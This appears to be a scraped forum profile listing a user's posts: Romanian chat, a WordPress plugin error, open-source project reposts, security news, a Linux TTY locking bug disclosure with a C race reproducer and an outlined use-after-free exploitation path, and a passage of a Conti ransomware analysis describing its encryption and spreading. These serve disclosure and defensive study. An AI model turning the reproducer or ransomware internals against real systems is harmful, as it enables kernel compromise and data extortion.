-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
L-am facut in vară cu Dan Negru
-
Salut, recent am instalat un plug-in pe o platforma Wordpress, primesc urmatoarea eroare: Warning: Use of undefined constant wp_head - assumed 'wp_head' (this will throw an Error in a future version of PHP) in /srv/disk15/3697334/www/.../.../wp-content/.../happynewyear.php on line 65 full code: <?php /* Plugin Name: Happy New Year Plugin URI: https://www.melihguney.com/wordpress-happy-new-year-plugin.html Description: This plugin will create a good skin in your wordpress blog. Version: 5.0 Author: Melih Guney Author URI: https://www.melihguney.com/ License: GPLv2 (or later) */ function happynewyear() { /* Path for snow */ $snowPath = get_option('siteurl').'/wp-content/plugins/happy-new-year/'; $snowJS = "\n".'<script type="text/javascript"> sitePath = "'.$snowPath.'"; </script>'."\n"; $snowJS .= '<script type="text/javascript" src="'.$snowPath.'jquery.js"></script>'."\n"; $snowJS .= '<script type="text/javascript" src="'.$snowPath.'newyear.js"></script>'."\n"; $snowJS .= '<script type="text/javascript" src="'.$snowPath.'snow.js"></script>'."\n"; print($snowJS); ?> <!-- Happy New Year Plugin Start --> <style type="text/css"> <!-- .govde { width:100%;} .solust { width:272px; height:283px; position:fixed; top:0; left:0; background:url('<?php echo plugins_url('leftimg.png', __FILE__); ?>') no-repeat top left; z-index:1; } .sagust { width:281px; height:268px; position:fixed; top:0; right:0; background:url('<?php echo plugins_url('rightimg.png', __FILE__); ?>') no-repeat top left; z-index:1; } .orta { display:block; width:500px; height:201px; position:fixed; top:0px; left:50%; margin-left:-250px; background:url('<?php echo plugins_url('centerimg.png', __FILE__); ?>') no-repeat top left; z-index:70; overflow:hidden; cursor:pointer; } .orta span { display:block; width:100%; font-family:'Lobster Two'; text-align:center; } .orta .day { font-size:26px; font-weight:bold; color:#383131; padding-top:10px; } .orta .time { font-size:37px; font-weight:400; color:#d21027; padding-top:15px; } .red { color:#c43042; font-weight:bold; text-decoration:none; } --> </style> <div class="govde"> <div onmouseover="document.getElementById('beep-one').play()" onMouseOut="document.getElementById('beep-one').pause()" alt="Happy New Year" border="0" usemap="#happynewyear" class="solust"></div> <div onmouseover="document.getElementById('beep-one').play()" onMouseOut="document.getElementById('beep-one').pause()" alt="Happy New Year" border="0" usemap="#happynewyear" class="sagust"></div> <div onmouseover="document.getElementById('beep-one').play()" onMouseOut="document.getElementById('beep-one').pause()" alt="Happy New Year" border="0" usemap="#happynewyear" id="cntdwn" class="orta"></div> </div> <script type="text/javascript" language="javascript"> // <![CDATA[ TargetDate = "01/01/2017 00:00 AM"; BackColor = "transparent"; ForeColor = "navy"; CountActive = true; CountStepper = -1; LeadingZero = true; DisplayFormat = '<span class="day">Last %%D%% Days</span> <span class="time">%%H%%:%%M%%:%%S%%</span>'; FinishMessage = '<span class="red">Happy New Year!</span> <span class="red">Welcome to 2021</span>'; // ]]> </script> <script type="text/javascript" src="<?php echo plugins_url('time.js', __FILE__); ?>"></script> <audio style="display:none;" id="beep-one" controls="controls" preload="auto"> <source src="<?php echo plugins_url('happynewyear.mp3', __FILE__); ?>"></source> </audio> <!-- Happy New Year Plugin End --> <?php } add_action(wp_head, "happynewyear"); ?> Lines: 64, 65, 66 <?php } add_action(wp_head, "happynewyear"); ?> Versiune PHP7.3.25 Versiune MySQL5.7 Unde este incorect? Multumesc anticipat
-
Nu stiu ce tot ai cu mine, dar in felul acesta presupun ca dupa razbvoi se mananc gogosile. Esti anti-social nene, si crede-ma ca am mai multi prieteni.... (te-am scos de la ignore) in fine ON-AIR: AMD sunt printre cele mai bune, jucam Call Of Duty pe un 3.5 Pentium III
-
Prima versiune este mai ok, cunosc pe cineva de si-a cumparat un i7 se dadea cu capul de pereti
-
https://rstforums.com/forum/forum/37-black-seo-monetizare/
- 1 reply
-
- 1
-
It was initially made for bash, but it supports zsh and ksh, too. If you want to use it with tcsh, make sure tcsh saves its history to ~/.tcsh_history. Installation Make sure you have ncurses packages installed. sudo apt install libncurses5 libncurses5-dev libncursesw5 libncursesw5-dev Then run: cargo install --git https://github.com/adder46/hstr-rs.git If on bash, add this to .bashrc: # append new history items to .bash_history shopt -s histappend # don't put duplicate lines or lines starting with space in the history HISTCONTROL=ignoreboth # increase history file size HISTFILESIZE=1000000 # increase history size HISTSIZE=${HISTFILESIZE} # append new entries from memory to .bash_history, and vice-versa export PROMPT_COMMAND="history -a; history -n; ${PROMPT_COMMAND}" Usage Making an alias should be the most convenient option, so you can add this to ~/.bash_aliases: alias hh=hstr-rs Screencast Download: hstr-rs-master.zip or git clone https://github.com/adder46/hstr-rs.git Source
-
- 1
-
@dixongsm mai traiesti bre?
-
amd radeon hd 6300m series
Kev replied to TNIcountry's topic in Sisteme de operare si discutii hardware
Download: https://www.pcmatic.com/company/libraries/driver/detail.asp?driver=AMD~Radeon~HD~6300M~Series~.html Cel mai bine este sa ii contactezi Contact: https://www.amd.com/en/support -
Overview ONLYOFFICE Community Server is a free open-source collaborative system developed to manage documents, projects, customer relationship and email correspondence, all in one place. Starting from version 11.0, Community Server is distributed as ONLYOFFICE Groups on terms of Apache License. Functionality Cross platform solution: Linux, Windows Document management Integration with Google Drive, Box, Dropbox, OneDrive, OwnCloud File sharing Document embedding Access rights management Customizable CRM Web-to-lead form Invoicing system Project Management Gantt Chart Milestones, task dependencies and subtasks Time tracking Automated reports Blogs, forums, polls, wiki Calendar Email Aggregator People module (employee database) Support of more than 20 languages Community Server (distributed as ONLYOFFICE Groups) is a part of ONLYOFFICE Workspace that also includes Document Server (distributed as ONLYOFFICE Docs), Mail Server, Talk (instant messaging app). Control Panel for administrating ONLYOFFICE Workspace can be found in this repo. Compiling To compile source, follow this instruction. Connecting your own modules You can now create your own modules and connect them to ONLYOFFICE Groups (packaged as Community Server). See this instruction for more details. Project information Official website: https://www.onlyoffice.com Code repository: https://github.com/ONLYOFFICE/CommunityServer Docker Image: https://github.com/ONLYOFFICE/Docker-CommunityServer License: Apache ONLYOFFICE Workspace: https://www.onlyoffice.com/workspace.aspx User feedback and support If you have any problems with or questions about ONLYOFFICE, please visit our official forum to find answers to your questions: dev.onlyoffice.org or you can ask and answer ONLYOFFICE development questions on Stack Overflow. Download: CommunityServer-master.zip or git clone https://github.com/ONLYOFFICE/CommunityServer.git Source
-
- 1
-
Wasmtime is a Bytecode Alliance project that is a standalone wasm-only optimizing runtime for WebAssembly and WASI. It runs WebAssembly code outside of the Web, and can be used both as a command-line utility or as a library embedded in a larger application. Installation The Wasmtime CLI can be installed on Linux and macOS with a small install script: $ curl https://wasmtime.dev/install.sh -sSf | bash Windows or otherwise interested users can download installers and binaries directly from the GitHub Releases page. Example If you've got the Rust compiler installed then you can take some Rust source code: fn main() { println!("Hello, world!"); } and compile/run it with: $ rustup target add wasm32-wasi $ rustc hello.rs --target wasm32-wasi $ wasmtime hello.wasm Hello, world! Features Lightweight. Wasmtime is a standalone runtime for WebAssembly that scales with your needs. It fits on tiny chips as well as makes use of huge servers. Wasmtime can be embedded into almost any application too. Fast. Wasmtime is built on the optimizing Cranelift code generator to quickly generate high-quality machine code at runtime. Configurable. Whether you need to precompile your wasm ahead of time, generate code blazingly fast with Lightbeam, or interpret it at runtime, Wasmtime has you covered for all your wasm-executing needs. WASI. Wasmtime supports a rich set of APIs for interacting with the host environment through the WASI standard. Standards Compliant. Wasmtime passes the official WebAssembly test suite, implements the official C API of wasm, and implements future proposals to WebAssembly as well. Wasmtime developers are intimately engaged with the WebAssembly standards process all along the way too. Language Support You can use Wasmtime from a variety of different languages through embeddings of the implementation: Rust - the wasmtime crate C - the wasm.h, wasi.h, and wasmtime.h headers Python - the wasmtime PyPI package .NET - the Wasmtime NuGet package Go - the wasmtime-go repository Documentation 📚 Read the Wasmtime guide here! 📚 Download: wasmtime-main.zip or git clone https://github.com/cfallin/wasmtime.git Source
-
http://www.megatypers.com https://rstforums.com/forum/topic/47808-cum-sa-faci-bani-rezolvand-captcha-uri/?tab=comments#comment-316622 Fix 200 "munca de chinezi" /pentru viitor, invatati limbajele cel putin la un low-level, iar ulterior puneti intrebari
-
Hackers have stolen the data of a large cosmetic surgery chain and are threatening to publish patients' before and after photos, among other details. The Hospital Group, which has a long list of celebrity endorsements, has confirmed the ransomware attack. It said it had informed the Information Commissioner of the breach. On its darknet webpage, the hacker group known as REvil said the "intimate photos of customers" were "not a completely pleasant sight". It claimed to have obtained more than 900 gigabytes of patient photographs. The Hospital Group, which is also known as the Transform Hospital Group, claims to be the UK's leading specialist weight loss and cosmetic surgery group. It has 11 clinics specialising in bariatric weight loss surgery, breast enlargements, nipple corrections and nose adjustments. The company has previously promoted itself via celebrity endorsements, although it has not done so for several years. Former Big Brother contestant Aisleyne Horgan-Wallace told Zoo magazine about her breast enhancement surgery with The Hospital Group in 2009. Atomic Kitten singer Kerry Katona, Shameless actress Tina Malone and reality TV star Joey Essex from The Only Way is Essex are also previous patients who have endorsed the clinic. 'Splattered around' The Hospital Group said in a statement: "We can confirm that our IT systems have been subject to a data security breach. None of our patients' payment card details have been compromised but at this stage, we understand that some of our patients' personal data may have been accessed." The company said it had emailed all its customers about the cyber-attack and would contact individuals who might have had more personal details compromised. It's understood that many before and after pictures will not include the patients' faces. One customer told the BBC he was worried about his pictures and data being in the hackers' hands. Simon Hails had chest reduction surgery with The Hospital Group. He said the company had not told him about the ransom. Ransomware is one of the most prolific forms of cyber-attack. It typically involves hackers gaining access to a computer network and either encrypting files or locking users out of their systems until a ransom is paid. More recently, ransomware gangs have been taking a copy of the data and threatening to release it. Law-enforcement agencies discourage victims from paying the ransom because doing so fuels the criminal enterprises. Cyber-security company Emsisoft estimates that the burgeoning form of cyber-crime has earned criminals $25bn (£18bn) in 2020. REvil, also known as Sodinokibi, is one of the most prolific ransomware groups. Its high-profile victims include currency exchange Travelex and entertainment law firm Grubman Shire Meiselas & Sacks. In September, The Hospital Group said surgery requests had increased by 25% since 2019. Its chief executive Tony Veverka told the ITV News Tonight programme at the time that Covid-19 health concerns had prompted the spike, as people tried to find ways to lose weight. Via bbc.com
-
ceva de genul vrei, puse pe tabel, si export, marca banu
-
Sa mor de nu am ramas in pom On: in ce limbaj? Edit: conctret pentru ce? pentru semafor, instalatie de brad etc..
-
Research shows that microphones on digital assistants are sensitive enough to record what someone is typing on a smartphone to steal PINs and other sensitive info. The potential for digital-home assistants like Amazon Alexa to infringe on user privacy by making and saving voice recordings of them is already widely known. Now researchers have discovered that the devices also may be able to “hear” and record what people are typing on nearby smartphones, even amid background noise. The microphones on digital assistants are sensitive enough that they can record the taps people make on a mobile device when sitting up to a foot and a half away, according to a team of researchers from the University of Cambridge. The researchers constructed an attack in which they used this capability to identify PINs and text typed into a smartphone. The same group of researchers already had discovered ways that various forms of technology can potentially violate user privacy by engaging in what they call “acoustic snooping.” Last year, they published research on how a smartphone app has the ability record the sound from its microphones and figure out from that what someone has typed, giving it the potential to steal PINs and passwords. The new research also builds on previous research that found that voice assistants could record the typing of keys on a computer to determine someone’s input, Anderson wrote in a blog post. It turns out that they are not, researchers found. Because modern voice assistants like Alexa have two to seven microphones, they can do directional localization, just as human ears do but with even greater sensitivity, the researchers discovered. Researchers based their attack on the fact that microphones located close to the screen can hear screen vibrations and use them successfully reconstruct the tap location, they said. For their attack, researchers also assumed that an attacker had access to microphones on a smart speaker near a target and aimed to steal PINs and passwords entered on their touchscreen. To construct the attack, researchers used a Raspberry Pi with a ReSpeaker six-microphone circular array to collect data. The Pi was running a simple TCP server that could be told to start and stop recording and save the audio to a six-channel .wav file. They also set up a Wi-Fi hotspot on the Pi so that participating devices could connect to it. The “victim devices” used in the experiments were an HTC Nexus 9 tablet, a Nokia 5.1 smartphone and a Huawei Mate20 Prosmartphone, all running Android 7 or above and having at least two microphones, they said. While only one of each device type was used, it’s likely that a second identical device also could be attacked using training from the first device, researchers noted. Alexa the Threat Aside from making voice recordings, it’s becoming increasingly clear that digital assistants have other ways of accessing sensitive data of their users that can be exploiting for nefarious purposes. A team of researchers last year also discovered that attackers can potentially use light to manipulate the microphones of digital assistants like the Amazon Echo to turn it into sound, using it to attack not only the device but others connected to it. Their research delved into how the ecosystem of devices connected to voice-activated assistant — such as smart-locks, home switches and even cars—could be hacked by using a device like an Amazon Echo as the gateway to take control of other devices as well. Other security holes in digital assistants also put people’s personal information at risk. Earlier this year, researchers found flaws in Alexa that could allow attackers to access users’ personal information, like home addresses, simply by persuading them to click on a malicious link. Via threatpost.com
-
Breaking Changes Spaces are not allowed in hex numbers anymore but undorscores are. It caused problems since 0xAA B could not be unambiguously parsed (e.g. it can be 0xAAB or 0xAA B, where 'B' is a unit for 'bytes', so make it explicit by writing 0xAA_B). Features Dark Theme Render command optimizations, reducing render command count by around 40% (gutters, line number- and result backround are now rendered only once as a big rectangle and not line by line). Active references (variables and line refs in the cursor's row) are now just underlined and the referenced lines are not highlighted fully only their left and right gutter. (Look at the image below) Results where a denominator is a unit (e.g. 5 / year) are now rendered in a more user-friendly way (e.g. instead of 5 year^-1 it is 5 / year) Automatic closing parenthesis/braces insertion when the opening one is typed Automatic closing parenthesis/braces deletion when the opening one is deleted Automatic parenthesis/braces wrapping around selected text if opening one is typed while a text is selected Matching parenthesis are highlighted if the cursor is inside them The note can be saved with ctrl-s (Though it is still saved automatically when there is no user interaction) It is possible to apply units directly on Line References or Variables, e.g. var = 12 var km The result of the second line will be 12 km Parsing improvement: Now the parser are smarter in deciding what is an operator (e.g. 'in' in 12 m in cm), a unit (12 in which is 12 inch), or a simple string (I downloaded 12 GB in 3 seconds). Now it is even possible to evaluate this string 12 in in in, which is equivalent of 12 inch in inch Percentage calculations Max row count was increased from 128 to 256 e (Euler's Number) was added, currently as a function (e()) Invalid argument types for functions are highlighted as errors (See image below) new functions: abs(num) ln(num) lg(num) log(num, num) sin(angle) -> num cos(angle) -> num tan(angle) -> num asin(num) -> angle acos(num) -> angle atan(num) -> angle Changed When opening a not empty note, the result panel now tries to be as close to the editor as possible to have a better overview about calculations and their results. GitHub and website links were added to the NoteCalc page Strings at the frontend are now rendered char by char. It is necessary to be able to place the cursor at the right place, since the text rendering does not guarantee that a single char takes exactly 'char-width' pixels. Overlay canvas (the canvas above the app canvas) was removed. It was used to draw overlay effects (e.g. pulsing), but it was problematic since it needed alpha blending, which wasn't always nice and console frontend support is limited. Now pulses are rendered above "BelowText" layer and below the "Text" layer. underscore is allowed in binary numbers (e.g. 0b11_00) Parenthesis have different color than operators. Remove Vec and dynamic allocation from unit parsing and operations. Replaced all unit RefCells to Rc, it was a mistake to use RefCells in the first place. Matrices cannot be deleted anymore by DEL or BACKSPACE, ctrl is needed Fixed Dead characters (e.g. '^' on a hungarian keyboard) were not possible to type Longest visible result length was calculated wrongly when there were multiple headers in a note, which affected the result panel size. sum variable get emptied at #Headers Char width at the fonrend is now integer, ceiling upward. It caused issues with rendering (widths of recatngles were float as well and did not always fill up the required space) Underlines and line reference background rectangles were rendered even if they were outside of the editor area ctrl-x did not copy the selected text Units in the denominator behaved buggy. now expressions like this works well tax A = 50 000/month tax B = 50 000/year (tax A + tax B) * (1 year) u64 values can be parsed correctly (e.g. 0xFFFFFFFFFFFFFFFF) Bitwise operations now work on u64 values Negative numbers can be presented in binary and hex form Line reference pulsing was called each time a cursor was pressed on the line ref's line, causing flickering 'Line normalization' (the process where the referenced lines' id is normalized to the referenced line actual line number) could be undo with ctrl-z Bitwise shifting operators (<< and >>) used wrapping, resulted in unwanted situations. Now it is an error to use larger shift operands than the underlying integer representation (u64 currently) Download notecalc3-0.3.0.zip notecalc3-0.3.0.tar.gz Source
-
Linux suffers from broken locking in TIOCSPGRP that can lead to a corrupted refcount. Linux: Broken locking in TIOCSPGRP leads to corrupted tty->pgrp refcount tiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature: static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p) It receives two `tty_struct` pointers because, for PTY pairs, userspace can use the same ioctl() on both sides of the pair, with slightly different semantics. `tty` points to the side that userspace passed to `ioctl()` as file descriptor (either the TTY or the master), while `real_tty` always points to the TTY. tiocspgrp() contains the following code: static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p) { [...] spin_lock_irq(&tty->ctrl_lock); put_pid(real_tty->pgrp); real_tty->pgrp = get_pid(pgrp); spin_unlock_irq(&tty->ctrl_lock); [...] } It always modifies the ->pgrp of the TTY but, depending on the file descriptor passed in by the caller, sometimes takes the ->ctrl_lock of the master instead. This means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on the TTY. The following reproducer quickly causes errors (e.g. starting with a \"refcount_t: addition on 0; use-after-free.\" message): ====================================================================== #define _GNU_SOURCE #include <err.h> #include <unistd.h> #include <fcntl.h> #include <termios.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/ioctl.h> #include <sys/wait.h> int main(void) { sync(); /* we're probably gonna crash... */ /* * We may already be process group leader but want to be session leader; * therefore, do everything in a child process. */ pid_t main_task = fork(); if (main_task == -1) err(1, \"initial fork\"); if (main_task != 0) { int status; if (waitpid(main_task, &status, 0) != main_task) err(1, \"waitpid main_task\"); return 0; } if (prctl(PR_SET_PDEATHSIG, SIGKILL)) err(1, \"PR_SET_PDEATHSIG\"); if (getppid() == 1) exit(0); /* basic preparation */ if (signal(SIGTTOU, SIG_IGN)) err(1, \"signal\"); if (setsid() == -1) err(1, \"start new session\"); /* set up a new pty pair */ int ptmx = open(\"/dev/ptmx\", O_RDWR); if (ptmx == -1) err(1, \"open ptmx\"); unlockpt(ptmx); int tty = open(ptsname(ptmx), O_RDWR); if (tty == -1) err(1, \"open tty\"); /* * Let a series of children change the ->pgrp pointer * protected by the tty's ctrl_lock... */ pid_t child = fork(); if (child == -1) err(1, \"fork\"); if (child == 0) { if (prctl(PR_SET_PDEATHSIG, SIGKILL)) err(1, \"PR_SET_PDEATHSIG\"); if (getppid() == 1) exit(0); while (1) { pid_t grandchild = fork(); if (grandchild == -1) err(1, \"fork grandchild\"); if (grandchild == 0) { if (setpgid(0, 0)) err(1, \"setpgid\"); int pgrp = getpid(); if (ioctl(tty, TIOCSPGRP, &pgrp)) err(1, \"TIOCSPGRP (tty)\"); exit(0); } int status; if (waitpid(grandchild, &status, 0) != grandchild) err(1, \"waitpid for grandchild\"); } } /* * ... while the parent changes the same ->pgrp pointer under the * ctrl_lock of the other side of the pty pair. */ while (1) { int pgrp = getpid(); if (ioctl(ptmx, TIOCSPGRP, &pgrp)) err(1, \"TIOCSPGRP (ptmx)\"); } } ====================================================================== This seems to me like it would be fairly promising as a target for exploitation; for example, a strategy along the following lines might work: - enter a deeply nested PID namespace, such that you have a SLUB cache like pid_10 to yourself - take a bunch of references to two `struct pid` instances (e.g. through pidfds or procfs?) - try to hit the bug in a loop such that the refcounts are hopefully off by a bit, but both `struct pid` instances still exist - on both `struct pid`, drop references one by one until one is freed - to detect reallocation, try to get SLUB to reuse the object for another PID, then check something like pidfd_show_fdinfo() or tiocgsid() on the old pid (which mostly dump plain data from a `struct pid` without touching other stuff in there) - get the entire SLUB high-order page freed, and try to reallocate it into another slab - exploit the resulting type confusion, e.g. by changing the refcount of the freed struct pid I haven't tried that yet though. I'm going to send suggested patches for this issue and for less severe TTY locking problems around the ->session pointer in a minute. (The ->session stuff is sufficiently theoretical that it probably doesn't really need the full security treatment, but I figured it'd be less messy if I include both here...) I have done some basic testing of these changes; the only thing that shows up as a problem is a lockdep warning about a possible deadlock when triggering the SAK logic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock), but that also happens on master and doesn't seem related to my changes. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-03-03. Disclosure at an earlier date is possible if the bug has been fixed in Linux stable releases (per agreement with security@kernel.org folks). Related CVE Numbers: CVE-2020-29661. Found by: jannh@google.com Source
-
- 1
-
Overview This is my full analysis for the Conti Ransomware version 2. Over the last few months, I have seen quite a few companies getting hit by this ransomware, so it’s been interesting analyzing and figuring how it works. As one of the newer ransomware families, Conti utilizes multi-threading features on Windows to encrypt files on machines To the fullest extent, making itself a lot faster than most ransomware out there. From the analysis, it’s clear that Conti is designed to target and encrypt business environments that uses SMB for file sharing and other services. Similar to the Sodinokibi family, Conti has the ability to scan existing ports and SMB shares on the network to spread its encryption, which can be a lot more impactful since it is not limited to the local machine. By the time this blog post comes out, researchers have found newer samples of the version 3. Even though this is an old sample, I still think it’s beneficial to provide the community with a deeper understanding about this malware. Figure 1: Conti overview IOCS Conti Ransomware version 2 comes in the form of a 32-bit PE file (either .exe or .dll). MD5: 0a49ed1c5419bb9752821d856f7ce4ff SHA256: 03b9c7a3b73f15dfc2dcb0b74f3e971fdda7d1d1e2010c6d1861043f90a2fecd Sample: https://bazaar.abuse.ch/sample/03b9c7a3b73f15dfc2dcb0b74f3e971fdda7d1d1e2010c6d1861043f90a2fecd/ Figure 2: VirusTotal result Ransom Note Figure 3: Conti Ransom Note The ID appended at the end is actually hard-coded, so it’s not a victim’s ID. This ID is most likely just the ID of this particular Conti sample. Below is the HTTPS version of the website for recovery service. Figure 4: Conti Website Dependencies The ransomware only has Kernel32.dll, User32.dll, and WS2_32.dll as visible imported DLLs. However, it does dynamically resolve a lot of DLLs through decrypting stack strings and calling LoadLibrary as seen here. Figure 5: Conti resolving DLL string names Here is the full list of the imported DLLs. Kernel32.dll Ntdll.dll Ole32.dll Shell32.dll Ws2_32.dll Shlwapi.dll Advapi32.dll Iphlpapi.dll Rstrtmgr.dll Netapi32.dll OleAut32_dll User32.dll PE Layout The unpacked version of the malware is around 208 KB in size, which consists of the .text, .rdata, .data, .rsrc, and .reloc sections. One of the main reasons why this executable is so big is because of the obsfucation method the developer uses. Instead of implementing a single string decryption function, they used one decrypting for loop for each encrypted string, which greatly increased the amount of raw code. Figure 6: Conti Layout Code Analysis String Decryption As mentioned above, Conti uses the method of building up a stack “string” that is encrypted and proceeds to decrypt it with a for loop. Every string is encrypted differently, so the for loop changes slightly for each of them. Figure 7: String decryption of explorer.exe Most of the decryption loops can be simplified to this single form where buffer is the encrypted string, a and b are positive numbers, and c is either 1 or -1. for i in range(len(buffer)): buffer[i] = (a * (c * (buffer[i] - b)) % 127 + 127) % 127 Dynamically Resolve API When resolving APIs, Conti calls a particular function that takes in an integer representing the DLL to find, an API hash value, and an offset into the API buffer. The DLL name is retrieved from the given integer through a switch statement. 15 ==> Kernel32.dll 16 ==> Ws2_32.dll 17 ==> Netapi32.dll 18 ==> Iphlpapi.dll 19 ==> Rstrtmgr.dll 20 ==> User32.dll 21 ==> Ws2_32.dll 22 ==> Shlwapi.dll 23 ==> Shell32.dll 24 ==> Ole32.dll 25 ==> OleAut32.dll 26 ==> Ntdll.dll After getting the DLL name, Conti will manually locate the export directory of that DLL, loop through each API, hash the name, and compare it with the hash from the parameter. After finding the correct API with the right hash value, it will proceed to find the address to that function. Figure 8: Function looping through export table and hash API name For the hashing algorithm, the constant 0x5BD1E995 gives this away that this is Murmur Hash Figure 9: Conti’s Murmur Hashing implementation After finding the address of the API, the malware adds that into its API array at the provided offset. This helps reducing the time to look up an API’s address if the malware has already resolved it before. Run-once Mutex Conti attempts to decrypt the string “jkbmusop9iqkamvcrewuyy777” and use that as the name of a Mutex object. Then, it checks if there is an instant of that Mutex running already. If there is, it will just wait until that thread exits before exiting. Figure 10: Checking for Mutex Command-line Arguments Conti can only be ran with command-line arguments, so it must be launched by a loader. Upon execution, it will process these arguments and behave accordingly. CMD Args Functionality -m local Encrypting the local machine’s hard drive with multiple threads -m net Encrypting network shares via SMB with mutiple threads -m all Encrypting both locally and on the network with multiple threads -p [directory] Encrypt a specific directory locally with 1 thread -size [chunk mode] Large encryption chunk mode -log [file name] Logging mode. Log everything to the file with the given name backups Unimplemented for some reason Encryption Despite having 3 different encrypting schemes, the main mechanism is relatively the same. First, it calls a function to populate a structure used to initialize information about the thread/threads of that encrypting schemes. These information includes the number of threads to spawn and a thread buffer that is used to store thread HANDLE objects. Figure 11: Function initializing thread struct Next, it calls this function to launch child threads. It checks the thread struct to see if the encrypting flag is set. If it is, loop from 0 to thread_count - 1 and spawn a thread to encrypt each time. It also adds these threads into the thread buffer for easy clean-up later. Figure 12: Function launching encrypting threads Multi-threading Beside when the argument -p is provided, multi-threading is involved for every other scheme of encryption. Conti will call GetNativeSystemInfo to retrieve information about the running system. If the argument “-m all” is provided, the number of threads to spawn will be double the amount of processors because it needs to encrypt both locally and on the network. For everything else, the number of threads to spawn is the same as the number of processors. Figure 13: Determining how many threads to spawn from number of processor Being able to thread its encryption, Conti utilizes all of the CPU threads available to simultaneously go through and encrypt the file system with incredible speed. Figure 14: Realistic representation of what happens when Conti runs The most interesting information in the thread structure is the string of the path to be encrypted. After having launch the threads, Conti’s main program will continuously traverse the file system and provide the thread structure with directory names. All of these threads will check this information and encrypt the updated path immediately. Because the workload is divided efficiently, Conti is able to speed up its traversing and encryption to a great extent. Figure 15: Main thread providing the drives to be encrypted Encrypting Locally RSA Public Key First, each thread will call CryptAcquireContextA with the cryptographic provider type PROV_RSA_AES to retrieve a handle of a CSP for RSA encryption. Using that CSP, it will call CryptImportKey to import from the hard-coded RSA public key. Figure 16: RSA Public Key embedded in the .data section Figure 17: CryptAcquireContextA and CryptImportKey called Next, it will enter an infinite loop to wait for the main thread to add a target drive path or to send a stop signal. This is accomplished solely through the shared thread struct that was created before launching these threads. Because the struct is shared between multiple threads, calls to EnterCriticalSection and LeaveCriticalSection are critical to maintain a thread-safe environment during encryption. Figure 18: Each thread continuously polling for an path name and encrypt it In the main encrypting function, it will iteratively call FindFirstFile on the directory name to search for all files and folders inside, avoiding the two current path and parent path names ”.” and ”..” which can cause an infinite loop if processed. Directory Check If the file being checked is a directory, it will check to see if the directory name is valid or not. If it is, then the child thread will add that path to the thread struct for itself or any other available thread to encrypt. Figure 19: Checking if the path is a valid directory These are the directory name that Conti will avoid encrypting. tmp, winnt, temp, thumb, $Recycle.Bin, $RECYCLE.BIN, System Volume Information, Boot, Windows, Trend Micro Normal File Check If the file is just a normal file, Conti will check to see if the file name is valid before proceed to encrypt it. Figure 20: Checking if the path is a valid file Conti will avoid encrypting any file with these names or extensions. CONTI_LOG.txt, readme.txt, .msi, .sys, .lnk, .dll, .exe Normal File Encryption First, Conti populates a structure in memory. I call this structure CONTI_STRUCT. struct CONTI_STRUCT { char *file_name; HANDLE hFile; LARGE_INTEGER file_size; int CHACHA8_const[4]; int CHACHA8_256_KEY[8]; int block_counter; int block_counter_ptr; int CHACHA8_none[2]; int random1[2]; int random2[8]; BYTE encrypted_key[524]; // encrypted ChaCha8 key }; Conti will call CryptGenRandom to generate 2 different random buffers and put them into the CONTI_STRUCT. Then, it populates the ChaCha8 constants which is just “expand 32-byte k” in hex form. The first buffer is 256 bits, which is later used as the ChaCha8 encrypting key, and the second one is 64 bits, which is used as the ChaCha8 nonce. Next, it will copy the key and nonce into the buffer at the end of the struct and encrypt it using the RSA key imported earlier. This is to ensure that the ChaCha key can not be recovered without the RSA private key. Figure 21: Generating random number Figure 22: Populating ChaCha8 constants and encrypt the random numbers with the RSA key Conti has 3 file categories for encryption - small, medium, and large files. Small files are marked with the value of 0x24, medium with 0x26, and large with 0x25. Before encryption, Conti will write the encrypted ChaCha8 key from CONTI_STRUCT, this mark, and the file size to at the end of the to-be-encrypted file. Figure 23: Writing the encrypted random ChaCha8 key, mark, and size to file Figure 24: The key at the end of an encrypted file 1. Small File Small files are files that are potentially less than 1MB in size. Conti looks for all files that is smaller than 1MB or by checking for these extensions below. .4dd, .4dl, .accdb, .accdc, .accde, .accdr, .accdt, .accft, .adb, .ade, .adf, .adp, .arc, .ora, .alf, .ask, .btr, .bdf, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db, .db-shm, .db-wal, .db3, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .ddl, .dlis, .dp1, .dqy, .dsk, .dsn, .dtsx, .dxl, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmpsl, .fol, .fp3, .fp4, .fp5, .fp7, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .ib, .idb, .ihx, .itdb, .itw, .jet, .jtx, .kdb, .kexi, .kexic, .kexis, .lgc, .lwx, .maf, .maq, .mar, .mas, .mav, .mdb, .mdf, .mpd, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .ns2, .ns3, .ns4, .nsf, .nv, .nv2, .nwdb, .nyf, .odb, .oqy, .orx, .owc, .p96, .p97, .pan, .pdb, .pdm, .pnz, .qry, .qvd, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sql, .sqlite, .sqlite3, .sqlitedb, .te, .temx, .tmd, .tps, .trc, .trm, .udb, .udl, .usr, .v12, .vis, .vpd, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff, .abcddb, .abs, .abx, .accdw, .adn, .db2, .fm5, .hjt, .icg, .icr, .kdb, .lut, .maw, .mdn, .md Encrypting small files are straightforward. Since these files are small enough, it typically does not require to loop and encrypt more than once. The file content is read into a buffer and encrypted directly. Just to be safe, the malware author did limit the maximum buffer size to read to 5MB, but it’s unlikely that the files going into this function is that big. Figure 25: Small File Encrypting mechanism 2. Medium File Medium files are files that are between 1MB to 5MB. For these files, Conti only encrypts the first 1 MB of the files. Figure 26: Medium File Encrypting mechanism 3. Large file Large files are files that are larger than 5MB. Conti specifically looks for these by checking for these extensions. .vdi, .vhd, .vmdk, .pvm, .vmem, .vmsn, .vmsd, .nvram, .vmx, .raw, .qcow2, .subvol, .bin, .vsv, .avhd, 